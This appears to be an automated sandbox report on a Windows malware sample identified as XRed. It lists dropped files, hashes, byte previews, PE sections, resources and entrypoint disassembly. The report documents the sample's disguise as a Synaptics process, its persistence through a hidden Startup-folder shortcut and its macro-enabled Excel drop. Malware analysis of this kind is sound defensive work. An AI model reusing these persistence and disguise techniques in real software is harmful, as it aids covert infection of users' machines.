(min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\nbz3EkU.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.2639520699049465
Encrypted:	false
SSDEEP:	24:GgsF+0SESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+XE+pAZewRDK4mW
MD5:	D5CC733EA129F2C626DB0B4B6792B52F
SHA1:	BDE519A6BE961A507167DDACFE9F62604CA583AB
SHA-256:	C01CBF03D8BECB5CDFBD8A071233B4050F58F647B4C65C2CD1A565AF780D5B48
SHA-512:	A4ED23944B7F4D8FE4366756F3AB058C13B292B38D9B9FBC70E2CF74E6EB83D40B4C1435E69F967ED3AEFD23F902ABBB19DFB2181CC24C49209DB58D1B56E710
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ayq6uMoklNZElaztWpdBCA">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\oEF89cL.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.263500840321227
Encrypted:	false
SSDEEP:	24:GgsF+0B32SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+Ym+pAZewRDK4mW
MD5:	8324F08E0AA4ED2387AAE21C9C004549
SHA1:	1CFE2714D1A434392EB89C69D61E1098AD4CD48A
SHA-256:	548BF3512E7C9709521E6C466A0ADEAF257892D5D50E1068759F3A03201767B4
SHA-512:	07E7A26404DA9569C1E243CC5209A91F99E88D41F0B34BE2B0C5A1EDEFD358001509707ED87E379AD47BBF9E6C3DA713C22C4E703386D0AF8720A8B62E84A007
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="GvC477hh9gj7hY6YwAnxyQ">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\pjLQ1lh.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.270995286790516
Encrypted:	false
SSDEEP:	24:GgsF+0T+SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+R+pAZewRDK4mW
MD5:	DEF8C26441D46C65C4BB3B05378C50BC
SHA1:	2F9E8D5DF570113B2F20B234EBE08A44886EDE05
SHA-256:	14DD30E9FE886974D42955B1D471CE71F1D5E55C858A45039313304148452257
SHA-512:	087EDCFFA549FE474DF53EC6944F2B8B07B0E6C5CADDAEA3EC5D08C1E2200CAB84A859FE19B85E9C87D4EC553732AA24CF47274FFCB581C015F36B3B7478B660
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Yg71HVvzW7Of7KLzusZV3w">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\xbm2HR9.ini

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
Category:	dropped
Size (bytes):	1652
Entropy (8bit):	5.259298858191848
Encrypted:	false
SSDEEP:	24:GgsF+00ZvSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+dZv+pAZewRDK4mW
MD5:	AE3FA1C5C0FD54B0AB319BA963E8A62F
SHA1:	7438E3563ADED397EC0EF7D1F9E2DC4B10185CBF
SHA-256:	ED2F96DD5D7B213E32DD9FB41DC46C9AC69E563A550D8E07D38C06FB0F25A976
SHA-512:	7D22300187A8D1BE65B8FA462DFA40D6CBED65CF84081C21BF57BD142FFB27DC540C4E2C826878C7A33748DB34187FBDE41F83B4DEDA0F771149AFD0972B522B
Malicious:	false
Preview:	<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fweQa_cZYXfLfdPDc2nGWw">{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5

C:\Users\user\AppData\Local\Temp\~$l8G3M3Tz.xlsm

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.3520167401771568
Encrypted:	false
SSDEEP:	3:xvXFz7f:9Xl
MD5:	4B86B2D21B2AC48AD3A1A46FBF1DE4D5
SHA1:	2D695349311A0DAF9B77392C04178F1BD99CCEF2
SHA-256:	22C126EA43AB2F7C80E19E857C50118A3E08A4A98BE31E2ADCFCA88C8E6C5A5D
SHA-512:	FE133E064DAF100FAD21CB4AE44AE573F66A0157A9418538FCE9744B8FB0500478EDE10B9A49E222AA21F14DCB32B384BA1B4D06402D6519EC4E645295F46B76
Malicious:	false
Preview:	.user ..b.r.o.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\~DF265ED6B4047AC27E.TMP

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	3.746897789531007
Encrypted:	false
SSDEEP:	192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
MD5:	7426F318A20A187D88A6EC88BBB53BAF
SHA1:	4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
SHA-256:	9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
SHA-512:	EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WSFDII.lnk

Download File

Process:	C:\Users\user\Desktop\._cache_KOGJZW.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:25:16 2024, mtime=Mon Dec 30 09:25:16 2024, atime=Mon Dec 30 09:25:16 2024, length=958976, window=hide
Category:	dropped
Size (bytes):	1802
Entropy (8bit):	3.4211242277876774
Encrypted:	false
SSDEEP:	24:8VujResoSB4e6wvk3OArjeE2+s9T4IlExxm:8VujQs6os3V4r9MIlEf
MD5:	EE500B294AAE6A19369C92000DACC3C4
SHA1:	E37F41B82B30F66A5905D9079601A3A374B42288
SHA-256:	A0E5731A2D0C2D58751A35E0BB1DF1F8CA4512920ECFC3F4E1302C11BCB7052A
SHA-512:	5139CFE7FCE8B9A4AD80A0A4A1CBC52D04F148BC3626468C1067B8A3CCC687D990F44C4C3F027578DFB343DD3573E759841A2DA91677C59C37F4505251228FE3
Malicious:	false
Preview:	L..................F.@.. ...*X...Z.......Z.......Z............................:..DG..Yr?.D..U..k0.&...&.........5q........Z..h.e..Z......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y&S...........................c..A.p.p.D.a.t.a...B.V.1......Y$S..Roaming.@......EW)N.Y$S............................s.R.o.a.m.i.n.g.....V.1......Y(S..Windata.@......Y(S.Y(S....?.....................qL..W.i.n.d.a.t.a.....`.2......Y)S .VZVDVH.exe..F......Y)S.Y)S....H.....................\|...V.Z.V.D.V.H...e.x.e......._...............-.......^...........C.......C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.V.Z.V.D.V.H...e.x.e.(.".C.:.\.U.s.e.r.s.\.b.r.o.k.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll..................................................................................................................

C:\Users\user\AppData\Roaming\Windata\VZVDVH.exe

Download File

Process:	C:\Users\user\Desktop\._cache_KOGJZW.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	958976
Entropy (8bit):	7.874462255577133
Encrypted:	false
SSDEEP:	24576:PhloDX0XOf4nWmp2kZjHo8OHYjLbVeg+2wRyPDU:PhloJfWt7Zs8O+XVe3w
MD5:	BDFE0E6CBA45083DA1F97E4BA1B8D14F
SHA1:	AFF058110281AD12CFAB3DBBEC47F2916C44093C
SHA-256:	EE512A79B6FFA936D1C5E75F8C1E161B563877A566F377706BE0B46CE3CB8C5A
SHA-512:	2F79A0E92AA12B2D99910156923E19D76E85D6D607CB2F56489AA19600932F7DE11B7CFD905489CA94801C7FF3FDB4F7009136D8171442D512473AD21D044332
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....kg.........."......P...`....................@..........................@ ...........@...@.......@......................4 .$........T..................<8 .........................................H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc....`.......Z...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

C:\Users\user\Desktop\._cache_KOGJZW.exe

Download File

Process:	C:\Users\user\Desktop\KOGJZW.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	958976
Entropy (8bit):	7.874462255577133
Encrypted:	false
SSDEEP:	24576:PhloDX0XOf4nWmp2kZjHo8OHYjLbVeg+2wRyPDU:PhloJfWt7Zs8O+XVe3w
MD5:	BDFE0E6CBA45083DA1F97E4BA1B8D14F
SHA1:	AFF058110281AD12CFAB3DBBEC47F2916C44093C
SHA-256:	EE512A79B6FFA936D1C5E75F8C1E161B563877A566F377706BE0B46CE3CB8C5A
SHA-512:	2F79A0E92AA12B2D99910156923E19D76E85D6D607CB2F56489AA19600932F7DE11B7CFD905489CA94801C7FF3FDB4F7009136D8171442D512473AD21D044332
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....kg.........."......P...`....................@..........................@ ...........@...@.......@......................4 .$........T..................<8 .........................................H...........................................UPX0....................................UPX1.....P.......D..................@....rsrc....`.......Z...H..............@..............................................................................................................................................................................................................................................................................................................................................................3.07.UPX!....

C:\Users\user\Documents\BJZFPPWAPT.xlsm

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	Microsoft Excel 2007+
Category:	dropped
Size (bytes):	18387
Entropy (8bit):	7.523057953697544
Encrypted:	false
SSDEEP:	384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
MD5:	E566FC53051035E1E6FD0ED1823DE0F9
SHA1:	00BC96C48B98676ECD67E81A6F1D7754E4156044
SHA-256:	8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
SHA-512:	A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
Malicious:	false
Preview:	PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-c.{...dT.m.kL]Yj.\|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

C:\Users\user\Documents\~$BJZFPPWAPT.xlsx

Download File

Process:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.3520167401771568
Encrypted:	false
SSDEEP:	3:xvXFz7f:9Xl
MD5:	4B86B2D21B2AC48AD3A1A46FBF1DE4D5
SHA1:	2D695349311A0DAF9B77392C04178F1BD99CCEF2
SHA-256:	22C126EA43AB2F7C80E19E857C50118A3E08A4A98BE31E2ADCFCA88C8E6C5A5D
SHA-512:	FE133E064DAF100FAD21CB4AE44AE573F66A0157A9418538FCE9744B8FB0500478EDE10B9A49E222AA21F14DCB32B384BA1B4D06402D6519EC4E645295F46B76
Malicious:	false
Preview:	.user ..b.r.o.k. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\user\Documents\~$cache1

Download File

Process:	C:\ProgramData\Synaptics\Synaptics.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	771584
Entropy (8bit):	6.6408899377896855
Encrypted:	false
SSDEEP:	12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9Imr:ansJ39LyjbJkQFMhmC+6GD9p
MD5:	7103F3EEC43BBABE34068295157F9F1C
SHA1:	A35D73E54E4BA166AC30889F57FA58284881102A
SHA-256:	2B6DB5563D77C827F5A662CB0A05359450DB29948863F9A5556C19CE14D05305
SHA-512:	F8A257ABA57A1EACF8F280651E74F97D2E14F326139282ABB506764C95FB57DB9C4708BAFD1AC027B030C40A866BE2BD04B3B0BFAC82F748B147E8A17DBD7188
Malicious:	true
Yara Hits:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B.....................&....................@.......................... ...................@..............................B...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.295970814639311
Encrypted:	false
SSDEEP:	6144:+41fWRYkg7Di2vXoy00lWZgiWaaKxC44Q0NbuDs+ovmBMZJh1VjH:v1/YCW2AoQ0NiOvwMHrVD
MD5:	97379BA551BBC4CF1A9D8D2CF56E707E
SHA1:	05A0CFA63AA93ED78134B6E9F41DE4E6E9638E06
SHA-256:	CE86888269904C62D655E570AD269AC3644F2EB7564487762FDBA1F8BF77F958
SHA-512:	71338E67F3C678F23CD905FC47EB51148B0A049F2C715B2D59CC39A8ABDC81C53D7CE4E7AA797696038F2371E868D9A183267EEBDD4D12A7AD9D75A1F5C07884
Malicious:	false
Preview:	regfG...G....\.Z.................... ....`......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.(.1.Z...............................................................................................................................................................................................................................................................................................................................................x..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.489425516936533
TrID:	Win32 Executable (generic) a (10002005/4) 93.09% Win32 Executable Borland Delphi 7 (665061/41) 6.19% UPX compressed Win32 Executable (30571/9) 0.28% Win32 EXE Yoda's Crypter (26571/9) 0.25% Win32 Executable Delphi generic (14689/80) 0.14%
File name:	KOGJZW.exe
File size:	1'730'560 bytes
MD5:	b53beba4041f41281a5aa172f93fbdd6
SHA1:	d0755c4d85bd826135ced6cd007cdeab6b58c077
SHA256:	5e73eaab677f6292e4a7e7a9180e4f80dbbdb5e2746d76244a65455883a2ca25
SHA512:	ca08c9c149f2edc89cbfc3900bdd7bda972aff9a4353ab6a62d7585872d3c84c9fdd6d11b0905038e40638574ea1b5772638f6cbfb521493fa13d81e22030b08
SSDEEP:	49152:8nsHyjtk2MYC5GDQhloJfWt7Zs8O+XVe3wD:8nsmtk2aphlTpC8tXVZ
TLSH:	3185CF26BD8145B3D32EF6388CE77368563EBE313E252E4DBAED3E4C5A391452814193
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	56070c0a8e0463db

Static PE Info

General

Entrypoint:	0x49ab80
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	332f7ce65ead0adfb3d35147033aabe9

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0049A778h
call 00007FC4A0AEF9EDh
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
call 00007FC4A0B43335h
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
mov edx, 0049ABE0h
call 00007FC4A0B42F34h
mov ecx, dword ptr [0049DBDCh]
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
mov edx, dword ptr [00496590h]
call 00007FC4A0B43324h
mov eax, dword ptr [0049DBCCh]
mov eax, dword ptr [eax]
call 00007FC4A0B43398h
call 00007FC4A0AED4CBh
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa0000	0x2a42	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb0000	0xfbf30	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa5000	0xa980	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0xa4018	0x21	.rdata
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xa4000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x99bec	0x99c00	33fbe30e8a64654287edd1bf05ae7c8c	False	0.5141641260162602	data	6.572957870355296	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x9b000	0x2e54	0x3000	1f5e19e7d20c1d128443d738ac7bc610	False	0.453125	data	4.854620797809023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0x9e000	0x11e5	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa0000	0x2a42	0x2c00	21ff53180b390dc06e3a1adf0e57a073	False	0.3537819602272727	data	4.919333216027082	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xa3000	0x10	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xa4000	0x39	0x200	a92cf494c617731a527994013429ad97	False	0.119140625	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "J"	0.7846201577093705	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xa5000	0xa980	0xaa00	dcd1b1c3f3d28d444920211170d1e8e6	False	0.5899816176470588	data	6.674124985579511	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xb0000	0xfbf30	0xfc000	b1dd77b2dd1fbd6f5c3c071f5fc1af06	False	0.8724248976934523	data	7.795855286160326	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xb0dc8	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.38636363636363635
RT_CURSOR	0xb0efc	0x134	data			0.4642857142857143
RT_CURSOR	0xb1030	0x134	data			0.4805194805194805
RT_CURSOR	0xb1164	0x134	data			0.38311688311688313
RT_CURSOR	0xb1298	0x134	data			0.36038961038961037
RT_CURSOR	0xb13cc	0x134	data			0.4090909090909091
RT_CURSOR	0xb1500	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_BITMAP	0xb1634	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb1804	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0xb19e8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xb1bb8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0xb1d88	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0xb1f58	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0xb2128	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0xb22f8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb24c8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0xb2698	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xb2868	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.4870689655172414
RT_ICON	0xb2950	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096			0.2861163227016886
RT_ICON	0xb39f8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 8192	Turkish	Turkey	0.2101313320825516
RT_DIALOG	0xb4aa0	0x52	data			0.7682926829268293
RT_STRING	0xb4af4	0x358	data			0.3796728971962617
RT_STRING	0xb4e4c	0x428	data			0.37406015037593987
RT_STRING	0xb5274	0x3a4	data			0.40879828326180256
RT_STRING	0xb5618	0x3bc	data			0.33472803347280333
RT_STRING	0xb59d4	0x2d4	data			0.4654696132596685
RT_STRING	0xb5ca8	0x334	data			0.42804878048780487
RT_STRING	0xb5fdc	0x42c	data			0.42602996254681647
RT_STRING	0xb6408	0x1f0	data			0.4213709677419355
RT_STRING	0xb65f8	0x1c0	data			0.44419642857142855
RT_STRING	0xb67b8	0xdc	data			0.6
RT_STRING	0xb6894	0x320	data			0.45125
RT_STRING	0xb6bb4	0xd8	data			0.5879629629629629
RT_STRING	0xb6c8c	0x118	data			0.5678571428571428
RT_STRING	0xb6da4	0x268	data			0.4707792207792208
RT_STRING	0xb700c	0x3f8	data			0.37598425196850394
RT_STRING	0xb7404	0x378	data			0.41103603603603606
RT_STRING	0xb777c	0x380	data			0.35379464285714285
RT_STRING	0xb7afc	0x374	data			0.4061085972850679
RT_STRING	0xb7e70	0xe0	data			0.5535714285714286
RT_STRING	0xb7f50	0xbc	data			0.526595744680851
RT_STRING	0xb800c	0x368	data			0.40940366972477066
RT_STRING	0xb8374	0x3fc	data			0.34901960784313724
RT_STRING	0xb8770	0x2fc	data			0.36649214659685864
RT_STRING	0xb8a6c	0x354	data			0.31572769953051644
RT_RCDATA	0xb8dc0	0x44	data			0.8676470588235294
RT_RCDATA	0xb8e04	0x10	data			1.5
RT_RCDATA	0xb8e14	0xea200	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed			0.9002780048718633
RT_RCDATA	0x1a3014	0x3	ASCII text, with no line terminators	Turkish	Turkey	3.6666666666666665
RT_RCDATA	0x1a3018	0x3c00	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	Turkish	Turkey	0.54296875
RT_RCDATA	0x1a6c18	0x64c	data			0.5998759305210918
RT_RCDATA	0x1a7264	0x153	Delphi compiled form 'TFormVir'			0.7522123893805309
RT_RCDATA	0x1a73b8	0x47d3	Microsoft Excel 2007+	Turkish	Turkey	0.8675150921846957
RT_GROUP_CURSOR	0x1abb8c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
